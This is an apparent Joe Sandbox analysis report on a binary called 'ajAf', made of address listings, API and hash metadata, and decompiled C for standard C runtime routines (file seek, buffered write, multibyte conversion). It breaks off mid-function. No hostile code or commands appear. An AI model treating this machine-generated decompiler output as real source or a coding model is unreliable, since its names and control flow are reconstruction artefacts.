                                                          0x0040c868
                                                          0x0040c86b
                                                          0x0040c88d
                                                          0x0040c88f
                                                          0x0040c892
                                                          0x0040c895
                                                          0x0040c89d
                                                          0x0040c89f
                                                          0x0040c8a6
                                                          0x0040c8ab
                                                          0x0040c8ae
                                                          0x0040c8c0
                                                          0x0040c8c0
                                                          0x0040c8c3
                                                          0x0040c8c3
                                                          0x0040c8c8
                                                          0x0040c8cd
                                                          0x0040c8cd
                                                          0x0040c8cf
                                                          0x0040c8cf
                                                          0x0040c8cf
                                                          0x0040c8cf
                                                          0x00000000
                                                          0x0040c8cd
                                                          0x0040c8b0
                                                          0x0040c8b3
                                                          0x0040c8b6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c8b8
                                                          0x0040c8be
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c8be
                                                          0x0040c8a1
                                                          0x0040c8a1
                                                          0x00000000
                                                          0x0040c8a1
                                                          0x0040c86d
                                                          0x0040c873
                                                          0x0040c880
                                                          0x0040c880
                                                          0x0040c882
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c877
                                                          0x0040c87a
                                                          0x0040c87c
                                                          0x0040c87c
                                                          0x0040c87c
                                                          0x0040c87c
                                                          0x0040c87f
                                                          0x0040c87f
                                                          0x0040c87f
                                                          0x0040c884
                                                          0x00000000
                                                          0x0040c884
                                                          0x0040c82b
                                                          0x00000000
                                                          0x0040c82b
                                                          0x0040c7fe
                                                          0x00000000
                                                          0x0040c7fe
                                                          0x0040c80a
                                                          0x0040c80f
                                                          0x00000000
                                                          0x0040c80f
                                                          0x0040c7ce
                                                          0x0040c7d8
                                                          0x0040c7db
                                                          0x0040c7e0
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c7e2
                                                          0x0040c7e4
                                                          0x0040c7e6
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c7e8
                                                          0x0040c7ea
                                                          0x0040c7ea
                                                          0x0040c7ed
                                                          0x0040c7ef
                                                          0x0040c7f2
                                                          0x0040c7f2
                                                          0x0040c7f2
                                                          0x0040c7f4
                                                          0x0040c7f5
                                                          0x0040c7f5
                                                          0x00000000
                                                          0x0040c7ea
                                                          0x00000000
                                                          0x0040c7ab
                                                          0x0040c79e
                                                          0x0040c75b
                                                          0x0040c760
                                                          0x0040c761
                                                          0x0040c762
                                                          0x0040c763
                                                          0x0040c764
                                                          0x0040c765
                                                          0x0040c76b
                                                          0x00000000

                                                          APIs
                                                          • __fileno.LIBCMT ref: 0040C77C
                                                          • __locking.LIBCMT ref: 0040C791
                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 2395185920-0
                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __fileno.LIBCMT ref: 01FCC9E3
                                                          • __locking.LIBCMT ref: 01FCC9F8
                                                            • Part of subcall function 01FCC228: __getptd_noexit.LIBCMT ref: 01FCC228
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 630670418-0
                                                          • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction ID: ee4b470a2108c20006ba6772b525ab08b7707b7d4ea38528f06515f454bcbfa5
                                                          • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                          • Instruction Fuzzy Hash: 5C51D671E0020BEFDB11CFACCA84758BBB1EF04B54F18826DD919A7281D732DA41EB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 97%
                                                          			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t30;
                                                          				signed int _t31;
                                                          				signed int _t32;
                                                          				signed int _t33;
                                                          				signed int _t35;
                                                          				signed int _t39;
                                                          				void* _t42;
                                                          				intOrPtr _t43;
                                                          				void* _t45;
                                                          				signed int _t48;
                                                          				signed int* _t53;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				void* _t57;
                                                          
                                                          				_t54 = __ebp;
                                                          				_t45 = __edx;
                                                          				_t42 = __ebx;
                                                          				_t53 = _a4;
                                                          				if(_t53 == 0) {
                                                          					L40:
                                                          					_t31 = _t30 | 0xffffffff;
                                                          					__eflags = _t31;
                                                          					return _t31;
                                                          				} else {
                                                          					_t43 = _a12;
                                                          					if(_t43 == 2) {
                                                          						goto L40;
                                                          					} else {
                                                          						_t30 = _t53[0xe];
                                                          						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                          							goto L40;
                                                          						} else {
                                                          							_t48 = _a8;
                                                          							if(_t53[0x17] != 0x77) {
                                                          								__eflags = _t43 - 1;
                                                          								if(_t43 == 1) {
                                                          									_t48 = _t48 + _t53[0x1a];
                                                          									__eflags = _t48;
                                                          								}
                                                          								__eflags = _t48;
                                                          								if(_t48 < 0) {
                                                          									goto L39;
                                                          								} else {
                                                          									__eflags = _t53[0x16];
                                                          									if(__eflags == 0) {
                                                          										_t33 = _t53[0x1a];
                                                          										__eflags = _t48 - _t33;
                                                          										if(_t48 < _t33) {
                                                          											_t30 = E004054F0(_t42, _t54, _t53);
                                                          											_t55 = _t55 + 4;
                                                          											__eflags = _t30;
                                                          											if(_t30 < 0) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L27;
                                                          											}
                                                          										} else {
                                                          											_t48 = _t48 - _t33;
                                                          											L27:
                                                          											__eflags = _t48;
                                                          											if(_t48 == 0) {
                                                          												L38:
                                                          												return _t53[0x1a];
                                                          											} else {
                                                          												__eflags = _t53[0x12];
                                                          												if(_t53[0x12] != 0) {
                                                          													L30:
                                                          													__eflags = _t53[0x1b] - 0xffffffff;
                                                          													if(_t53[0x1b] != 0xffffffff) {
                                                          														_t53[0x1a] = _t53[0x1a] + 1;
                                                          														_t48 = _t48 - 1;
                                                          														__eflags = _t53[0x1c];
                                                          														_t53[0x1b] = 0xffffffff;
                                                          														if(_t53[0x1c] != 0) {
                                                          															_t53[0xe] = 1;
                                                          														}
                                                          													}
                                                          													__eflags = _t48;
                                                          													if(_t48 <= 0) {
                                                          														goto L38;
                                                          													} else {
                                                          														while(1) {
                                                          															_t35 = 0x4000;
                                                          															__eflags = _t48 - 0x4000;
                                                          															if(_t48 < 0x4000) {
                                                          																_t35 = _t48;
                                                          															}
                                                          															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                          															_t55 = _t55 + 0xc;
                                                          															__eflags = _t30;
                                                          															if(_t30 <= 0) {
                                                          																goto L39;
                                                          															}
                                                          															_t48 = _t48 - _t30;
                                                          															__eflags = _t48;
                                                          															if(_t48 > 0) {
                                                          																continue;
                                                          															} else {
                                                          																goto L38;
                                                          															}
                                                          															goto L41;
                                                          														}
                                                          														goto L39;
                                                          													}
                                                          												} else {
                                                          													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                          													_t55 = _t55 + 4;
                                                          													_t53[0x12] = _t30;
                                                          													__eflags = _t30;
                                                          													if(_t30 == 0) {
                                                          														goto L39;
                                                          													} else {
                                                          														goto L30;
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_push(0);
                                                          										_push(_t48);
                                                          										_push(_t53[0x10]);
                                                          										_t53[0x1b] = 0xffffffff;
                                                          										_t53[1] = 0;
                                                          										 *_t53 = _t53[0x11];
                                                          										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                          										__eflags = _t30;
                                                          										if(_t30 < 0) {
                                                          											goto L39;
                                                          										} else {
                                                          											_t53[0x1a] = _t48;
                                                          											_t53[0x19] = _t48;
                                                          											return _t48;
                                                          										}
                                                          									}
                                                          								}
                                                          							} else {
                                                          								if(_t43 == 0) {
                                                          									_t48 = _t48 - _t53[0x19];
                                                          								}
                                                          								if(_t48 < 0) {
                                                          									L39:
                                                          									_t32 = _t30 | 0xffffffff;
                                                          									__eflags = _t32;
                                                          									return _t32;
                                                          								} else {
                                                          									if(_t53[0x11] != 0) {
                                                          										L11:
                                                          										if(_t48 <= 0) {
                                                          											L17:
                                                          											return _t53[0x19];
                                                          										} else {
                                                          											while(1) {
                                                          												_t39 = 0x4000;
                                                          												if(_t48 < 0x4000) {
                                                          													_t39 = _t48;
                                                          												}
                                                          												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                          												_t55 = _t55 + 0xc;
                                                          												if(_t30 == 0) {
                                                          													goto L39;
                                                          												}
                                                          												_t48 = _t48 - _t30;
                                                          												if(_t48 > 0) {
                                                          													continue;
                                                          												} else {
                                                          													goto L17;
                                                          												}
                                                          												goto L41;
                                                          											}
                                                          											goto L39;
                                                          										}
                                                          									} else {
                                                          										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                          										_t57 = _t55 + 4;
                                                          										_t53[0x11] = _t30;
                                                          										if(_t30 == 0) {
                                                          											goto L39;
                                                          										} else {
                                                          											E0040BA30(_t48, _t30, 0, 0x4000);
                                                          											_t55 = _t57 + 0xc;
                                                          											goto L11;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L41:
                                                          			}



















                                                          0x00405d00
                                                          0x00405d00
                                                          0x00405d00
                                                          0x00405d01
                                                          0x00405d07
                                                          0x00405e7f
                                                          0x00405e7f
                                                          0x00405e7f
                                                          0x00405e83
                                                          0x00405d0d
                                                          0x00405d0d
                                                          0x00405d14
                                                          0x00000000
                                                          0x00405d1a
                                                          0x00405d1a
                                                          0x00405d20
                                                          0x00000000
                                                          0x00405d2f
                                                          0x00405d34
                                                          0x00405d38
                                                          0x00405dad
                                                          0x00405db0
                                                          0x00405db2
                                                          0x00405db2
                                                          0x00405db2
                                                          0x00405db5
                                                          0x00405db7
                                                          0x00000000
                                                          0x00405dbd
                                                          0x00405dbd
                                                          0x00405dc1
                                                          0x00405df8
                                                          0x00405dfb
                                                          0x00405dfd
                                                          0x00405e04
                                                          0x00405e09
                                                          0x00405e0c
                                                          0x00405e0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405dff
                                                          0x00405dff
                                                          0x00405e10
                                                          0x00405e10
                                                          0x00405e12
                                                          0x00405e73
                                                          0x00405e78
                                                          0x00405e14
                                                          0x00405e14
                                                          0x00405e18
                                                          0x00405e2e
                                                          0x00405e2e
                                                          0x00405e32
                                                          0x00405e34
                                                          0x00405e37
                                                          0x00405e38
                                                          0x00405e3c
                                                          0x00405e43
                                                          0x00405e45
                                                          0x00405e45
                                                          0x00405e43
                                                          0x00405e4c
                                                          0x00405e4e
                                                          0x00000000
                                                          0x00405e50
                                                          0x00405e50
                                                          0x00405e50
                                                          0x00405e55
                                                          0x00405e57
                                                          0x00405e59
                                                          0x00405e59
                                                          0x00405e61
                                                          0x00405e66
                                                          0x00405e69
                                                          0x00405e6b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e6d
                                                          0x00405e6f
                                                          0x00405e71
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e71
                                                          0x00000000
                                                          0x00405e50
                                                          0x00405e1a
                                                          0x00405e1f
                                                          0x00405e24
                                                          0x00405e27
                                                          0x00405e2a
                                                          0x00405e2c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e2c
                                                          0x00405e18
                                                          0x00405e12
                                                          0x00405dc3
                                                          0x00405dc9
                                                          0x00405dcb
                                                          0x00405dcc
                                                          0x00405dcd
                                                          0x00405dd4
                                                          0x00405ddb
                                                          0x00405ddd
                                                          0x00405de5
                                                          0x00405de7
                                                          0x00000000
                                                          0x00405ded
                                                          0x00405ded
                                                          0x00405df0
                                                          0x00405df7
                                                          0x00405df7
                                                          0x00405de7
                                                          0x00405dc1
                                                          0x00405d3a
                                                          0x00405d3c
                                                          0x00405d3e
                                                          0x00405d3e
                                                          0x00405d43
                                                          0x00405e79
                                                          0x00405e7a
                                                          0x00405e7a
                                                          0x00405e7e
                                                          0x00405d49
                                                          0x00405d4d
                                                          0x00405d77
                                                          0x00405d79
                                                          0x00405da7
                                                          0x00405dac
                                                          0x00405d7b
                                                          0x00405d80
                                                          0x00405d80
                                                          0x00405d87
                                                          0x00405d89
                                                          0x00405d89
                                                          0x00405d91
                                                          0x00405d96
                                                          0x00405d9b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405da1
                                                          0x00405da5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405da5
                                                          0x00000000
                                                          0x00405d80
                                                          0x00405d4f
                                                          0x00405d54
                                                          0x00405d59
                                                          0x00405d5c
                                                          0x00405d61
                                                          0x00000000
                                                          0x00405d67
                                                          0x00405d6f
                                                          0x00405d74
                                                          0x00000000
                                                          0x00405d74
                                                          0x00405d61
                                                          0x00405d4d
                                                          0x00405d43
                                                          0x00405d38
                                                          0x00405d20
                                                          0x00405d14
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _fseek_malloc_memset
                                                          • String ID:
                                                          • API String ID: 208892515-0
                                                          • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                          • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t59;
                                                          				intOrPtr* _t61;
                                                          				signed int _t63;
                                                          				void* _t68;
                                                          				signed int _t69;
                                                          				signed int _t72;
                                                          				signed int _t74;
                                                          				signed int _t75;
                                                          				signed int _t77;
                                                          				signed int _t78;
                                                          				signed int _t81;
                                                          				signed int _t82;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				signed int _t99;
                                                          				intOrPtr* _t100;
                                                          				void* _t101;
                                                          
                                                          				_t90 = __edx;
                                                          				if(_a8 == 0 || _a12 == 0) {
                                                          					L4:
                                                          					return 0;
                                                          				} else {
                                                          					_t100 = _a16;
                                                          					_t105 = _t100;
                                                          					if(_t100 != 0) {
                                                          						_t82 = _a4;
                                                          						__eflags = _t82;
                                                          						if(__eflags == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t63 = _t59 | 0xffffffff;
                                                          						_t90 = _t63 % _a8;
                                                          						__eflags = _a12 - _t63 / _a8;
                                                          						if(__eflags > 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t97 = _a8 * _a12;
                                                          						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                          						_v8 = _t82;
                                                          						_v16 = _t97;
                                                          						_t81 = _t97;
                                                          						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                          							_v12 = 0x1000;
                                                          						} else {
                                                          							_v12 =  *(_t100 + 0x18);
                                                          						}
                                                          						__eflags = _t97;
                                                          						if(_t97 == 0) {
                                                          							L32:
                                                          							return _a12;
                                                          						} else {
                                                          							do {
                                                          								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                          								__eflags = _t84;
                                                          								if(_t84 == 0) {
                                                          									L18:
                                                          									__eflags = _t81 - _v12;
                                                          									if(_t81 < _v12) {
                                                          										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                          										__eflags = _t68 - 0xffffffff;
                                                          										if(_t68 == 0xffffffff) {
                                                          											L34:
                                                          											_t69 = _t97;
                                                          											L35:
                                                          											return (_t69 - _t81) / _a8;
                                                          										}
                                                          										_v8 = _v8 + 1;
                                                          										_t72 =  *(_t100 + 0x18);
                                                          										_t81 = _t81 - 1;
                                                          										_v12 = _t72;
                                                          										__eflags = _t72;
                                                          										if(_t72 <= 0) {
                                                          											_v12 = 1;
                                                          										}
                                                          										goto L31;
                                                          									}
                                                          									__eflags = _t84;
                                                          									if(_t84 == 0) {
                                                          										L21:
                                                          										__eflags = _v12;
                                                          										_t98 = _t81;
                                                          										if(_v12 != 0) {
                                                          											_t75 = _t81;
                                                          											_t90 = _t75 % _v12;
                                                          											_t98 = _t98 - _t75 % _v12;
                                                          											__eflags = _t98;
                                                          										}
                                                          										_push(_t98);
                                                          										_push(_v8);
                                                          										_push(E0040FA20(_t90, _t98, _t100));
                                                          										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                          										_t101 = _t101 + 0xc;
                                                          										__eflags = _t74 - 0xffffffff;
                                                          										if(_t74 == 0xffffffff) {
                                                          											L36:
                                                          											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                          											_t69 = _v16;
                                                          											goto L35;
                                                          										} else {
                                                          											_t88 = _t98;
                                                          											__eflags = _t74 - _t98;
                                                          											if(_t74 <= _t98) {
                                                          												_t88 = _t74;
                                                          											}
                                                          											_v8 = _v8 + _t88;
                                                          											_t81 = _t81 - _t88;
                                                          											__eflags = _t74 - _t98;
                                                          											if(_t74 < _t98) {
                                                          												goto L36;
                                                          											} else {
                                                          												L27:
                                                          												_t97 = _v16;
                                                          												goto L31;
                                                          											}
                                                          										}
                                                          									}
                                                          									_t77 = E0040C1FB(_t100);
                                                          									__eflags = _t77;
                                                          									if(_t77 != 0) {
                                                          										goto L34;
                                                          									}
                                                          									goto L21;
                                                          								}
                                                          								_t78 =  *(_t100 + 4);
                                                          								__eflags = _t78;
                                                          								if(__eflags == 0) {
                                                          									goto L18;
                                                          								}
                                                          								if(__eflags < 0) {
                                                          									_t48 = _t100 + 0xc;
                                                          									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                          									__eflags =  *_t48;
                                                          									goto L34;
                                                          								}
                                                          								_t99 = _t81;
                                                          								__eflags = _t81 - _t78;
                                                          								if(_t81 >= _t78) {
                                                          									_t99 = _t78;
                                                          								}
                                                          								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                          								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                          								 *_t100 =  *_t100 + _t99;
                                                          								_t101 = _t101 + 0xc;
                                                          								_t81 = _t81 - _t99;
                                                          								_v8 = _v8 + _t99;
                                                          								goto L27;
                                                          								L31:
                                                          								__eflags = _t81;
                                                          							} while (_t81 != 0);
                                                          							goto L32;
                                                          						}
                                                          					}
                                                          					L3:
                                                          					_t61 = E0040BFC1(_t105);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					 *_t61 = 0x16;
                                                          					E0040E744(_t90, 0, _t100);
                                                          					goto L4;
                                                          				}
                                                          			}





























                                                          0x0040baaa
                                                          0x0040baba
                                                          0x0040bae0
                                                          0x00000000
                                                          0x0040bac1
                                                          0x0040bac1
                                                          0x0040bac4
                                                          0x0040bac6
                                                          0x0040bae7
                                                          0x0040baea
                                                          0x0040baec
                                                          0x00000000
                                                          0x00000000
                                                          0x0040baee
                                                          0x0040baf3
                                                          0x0040baf6
                                                          0x0040baf9
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bafe
                                                          0x0040bb02
                                                          0x0040bb09
                                                          0x0040bb0c
                                                          0x0040bb0f
                                                          0x0040bb11
                                                          0x0040bb1b
                                                          0x0040bb13
                                                          0x0040bb16
                                                          0x0040bb16
                                                          0x0040bb22
                                                          0x0040bb24
                                                          0x0040bbe9
                                                          0x00000000
                                                          0x0040bb2a
                                                          0x0040bb2a
                                                          0x0040bb2d
                                                          0x0040bb2d
                                                          0x0040bb33
                                                          0x0040bb64
                                                          0x0040bb64
                                                          0x0040bb67
                                                          0x0040bbc0
                                                          0x0040bbc7
                                                          0x0040bbca
                                                          0x0040bbf5
                                                          0x0040bbf5
                                                          0x0040bbf7
                                                          0x00000000
                                                          0x0040bbfb
                                                          0x0040bbcc
                                                          0x0040bbcf
                                                          0x0040bbd2
                                                          0x0040bbd3
                                                          0x0040bbd6
                                                          0x0040bbd8
                                                          0x0040bbda
                                                          0x0040bbda
                                                          0x00000000
                                                          0x0040bbd8
                                                          0x0040bb69
                                                          0x0040bb6b
                                                          0x0040bb78
                                                          0x0040bb78
                                                          0x0040bb7c
                                                          0x0040bb7e
                                                          0x0040bb82
                                                          0x0040bb84
                                                          0x0040bb87
                                                          0x0040bb87
                                                          0x0040bb87
                                                          0x0040bb89
                                                          0x0040bb8a
                                                          0x0040bb94
                                                          0x0040bb95
                                                          0x0040bb9a
                                                          0x0040bb9d
                                                          0x0040bba0
                                                          0x0040bc03
                                                          0x0040bc03
                                                          0x0040bc07
                                                          0x00000000
                                                          0x0040bba2
                                                          0x0040bba2
                                                          0x0040bba4
                                                          0x0040bba6
                                                          0x0040bba8
                                                          0x0040bba8
                                                          0x0040bbaa
                                                          0x0040bbad
                                                          0x0040bbaf
                                                          0x0040bbb1
                                                          0x00000000
                                                          0x0040bbb3
                                                          0x0040bbb3
                                                          0x0040bbb3
                                                          0x00000000
                                                          0x0040bbb3
                                                          0x0040bbb1
                                                          0x0040bba0
                                                          0x0040bb6e
                                                          0x0040bb74
                                                          0x0040bb76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bb76
                                                          0x0040bb35
                                                          0x0040bb38
                                                          0x0040bb3a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040bb3c
                                                          0x0040bbf1
                                                          0x0040bbf1
                                                          0x0040bbf1
                                                          0x00000000
                                                          0x0040bbf1
                                                          0x0040bb42
                                                          0x0040bb44
                                                          0x0040bb46
                                                          0x0040bb48
                                                          0x0040bb48
                                                          0x0040bb50
                                                          0x0040bb55
                                                          0x0040bb58
                                                          0x0040bb5a
                                                          0x0040bb5d
                                                          0x0040bb5f
                                                          0x00000000
                                                          0x0040bbe1
                                                          0x0040bbe1
                                                          0x0040bbe1
                                                          0x00000000
                                                          0x0040bb2a
                                                          0x0040bb24
                                                          0x0040bac8
                                                          0x0040bac8
                                                          0x0040bacd
                                                          0x0040bace
                                                          0x0040bacf
                                                          0x0040bad0
                                                          0x0040bad1
                                                          0x0040bad2
                                                          0x0040bad8
                                                          0x00000000
                                                          0x0040badd

                                                          APIs
                                                          • __flush.LIBCMT ref: 0040BB6E
                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                          • __locking.LIBCMT ref: 0040BB95
                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 3240763771-0
                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                          • String ID:
                                                          • API String ID: 1291973410-0
                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction ID: 464b393105b6345609bc9399581d4a4af2b552dc98ae927bfde97bdddda0132b
                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                          • Instruction Fuzzy Hash: 1341F535E0060BEBDB148F69CA9259EBBB6EF80FA0F24852DD51597140D732D940AF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _fseek_malloc_memset
                                                          • String ID:
                                                          • API String ID: 208892515-0
                                                          • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction ID: f7f0d3428ef89c077805173facaf11e11f254fa3aacd29ab8c5edf76c88a4ba3
                                                          • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                          • Instruction Fuzzy Hash: E941C672A48B138AD730862D9F0071776F59F90A74F140A1DE6DAD2790E733E445E741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				char _v8;
                                                          				signed int _v12;
                                                          				char _v20;
                                                          				char _t43;
                                                          				char _t46;
                                                          				signed int _t53;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				int _t57;
                                                          				int _t58;
                                                          				signed short* _t59;
                                                          				short* _t60;
                                                          				int _t65;
                                                          				char* _t72;
                                                          
                                                          				_t72 = _a8;
                                                          				if(_t72 == 0 || _a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					if( *_t72 != 0) {
                                                          						E0040EC86( &_v20, _a16);
                                                          						_t43 = _v20;
                                                          						__eflags =  *(_t43 + 0x14);
                                                          						if( *(_t43 + 0x14) != 0) {
                                                          							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                          							__eflags = _t46;
                                                          							if(_t46 == 0) {
                                                          								__eflags = _a4;
                                                          								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                          								if(__eflags != 0) {
                                                          									L10:
                                                          									__eflags = _v8;
                                                          									if(_v8 != 0) {
                                                          										_t53 = _v12;
                                                          										_t11 = _t53 + 0x70;
                                                          										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                          										__eflags =  *_t11;
                                                          									}
                                                          									return 1;
                                                          								}
                                                          								L21:
